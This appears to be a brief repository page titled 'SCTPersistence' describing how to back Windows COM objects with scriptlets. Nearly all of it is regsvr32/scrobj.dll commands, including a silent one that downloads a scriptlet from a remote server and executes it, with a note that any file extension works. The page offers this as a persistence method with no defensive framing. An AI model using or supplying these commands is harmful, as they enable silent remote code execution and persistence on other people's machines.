/SCTPersistence

Create COM Objects backed by Scripts, not DLLs

Primary LanguageJavaScriptBSD 3-Clause "New" or "Revised" LicenseBSD-3-Clause

regsvr32 /i:"FILE.sct" scrobj.dll
regsvr32 /i:"FILE.whateverextension" scrobj.dll //This works too.
and this...
regsvr32 /s /i:http://server/file.ext scrobj.dll



Good Reference Here:
http://thrysoee.dk/InsideCOM+/